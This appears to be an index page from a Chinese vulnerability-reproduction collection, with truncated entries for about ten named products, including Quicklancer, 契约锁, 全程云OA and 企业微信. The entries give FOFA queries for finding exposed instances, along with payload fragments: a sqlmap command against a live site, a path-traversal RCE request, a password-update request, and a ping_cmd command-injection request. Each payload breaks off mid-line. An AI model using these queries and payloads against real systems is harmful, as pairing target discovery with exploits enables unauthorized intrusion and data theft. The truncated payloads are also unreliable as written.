Q16-1Quicklancer–SQL fofa语法: “service_fragments/css/gig_detail.css” 漏洞复现: payload: python sqlmap.py -u "https://quicklancer.bylancer.com/listing?cat=6
Q15-1契约锁-电子签章平台-RCE 漏洞复现: payload: POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Ma
Q14-1群杰-印章物联网管理平台-PermissionAC 漏洞复现: payload: GET /api/token/updateRestUser?restname=rest&password={{password}}
Q13-1全息-AI网络运维平台-RCE fofa语法: fofa:“全息AI网络运维平台” 漏洞复现: payload: POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1 host:127.0.0.1 ping_cmd=8.8
Q11-1青岛东胜-东胜物流软件-SQL 漏洞描述: 东胜物流软件 GetProParentModuTreeList 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木
Q10-1青铜器-RDM研发管理平台-文件上传 漏洞描述: 青铜器RDM研发管理平台 upload 接口存在任意文件上传漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 网站图片: 网络测绘: fofa语法: FOFA:bod
Q9-1企语iFair-协同管理系统-任意文件读取 漏洞描述: 企语iFair协同管理系统getuploadimage.jsp接口处存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取服务器敏感信息,使系统处于极不安全状态。 影响版本: 企语iFair <= v23.8_ad0 网站图
Q8-2全程云-OA-SQL 漏洞描述: 全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能,超过100多个子模块。为企业内部提供高效、畅通的信息渠道,同时也能大力推动公司信息系统发展,提高企业的办公自动化程度和综合管理水平,加快企业信息的流通,提高企业
Q8-1全程云-OA-SQL 漏洞描述: 由于全程云oa办公系统 ajax.ashx页面参数过滤不当,导致存在sql注入漏洞,未授权的攻击者可利用该漏洞获取数据库中的敏感信息。 网站图片: 网络测绘: fofa语法: FOFA:body=“images/yipeoplehover.png”</
Q7-1企业微信-PermissionAC 漏洞描述: 企业微信/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息,可导致企业微信全量数据被获取,文件获取、使用企业微信轻应用对内利用发送钓鱼文件和链接等风险。 网站图片: 网络测绘: Hunt
